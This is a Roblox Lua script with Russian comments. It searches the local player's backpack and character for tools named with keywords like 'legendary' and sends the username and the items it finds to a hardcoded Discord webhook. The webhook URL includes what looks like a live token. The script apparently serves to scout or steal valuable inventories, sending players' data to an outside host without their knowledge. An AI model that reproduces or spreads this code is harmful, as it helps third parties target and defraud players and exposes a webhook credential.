local Players = game:GetService("Players")
local Workspace = game:GetService("Workspace")
local HttpService = game:GetService("HttpService")

local localPlayer = Players.LocalPlayer
local WEBHOOK_URL = "https://discord.com/api/webhooks/1417846130619977738/mgmCuOeNpaNOBQddZUtCPaeheSjaBWdLNLfPPg2xk6-533OjiGgbjxwmkKPsQO7TK9ep"

-- === Ключевые слова для поиска секреток ===
local SECRET_KEYWORDS = {"gara", "ultra", "legendary"}

-- === Скан инвентаря и поиск секреток ===
local function scanInventory()
    local foundItems = {}

    local function checkContainer(container)
        if not container then return end
        for _, item in ipairs(container:GetChildren()) do
            if item:IsA("Tool") then
                local nameLower = item.Name:lower()
                for _, keyword in ipairs(SECRET_KEYWORDS) do
                    if string.find(nameLower, keyword) then
                        table.insert(foundItems, item.Name)
                        break
                    end
                end
            end
        end
    end

    checkContainer(localPlayer:FindFirstChild("Backpack"))
    checkContainer(localPlayer.Character)

    if #foundItems == 0 then
        return nil -- ничего не нашли
    else
        local text = "\n--- Secret Inventory ---\n"
        for _, name in ipairs(foundItems) do
            text = text .. "- " .. name .. "\n"
        end
        return text
    end
end

-- === Отправка в Discord ===
local function sendToDiscord(content)
    if not content then return end
    local body = HttpService:JSONEncode({
        ["embeds"] = {{
            ["title"] = "**Secret Inventory Scan**",
            ["color"] = 16776960,
            ["fields"] = {
                {["name"] = "👤 Username", ["value"] = localPlayer.Name, ["inline"] = false},
                {["name"] = "🪐 Found Items", ["value"] = content, ["inline"] = false}
            }
        }}
    })
    HttpService:PostAsync(WEBHOOK_URL, body, Enum.HttpContentType.ApplicationJson)
end

-- === Основной запуск ===
local scanned = scanInventory()
if scanned then
    sendToDiscord(scanned)
end
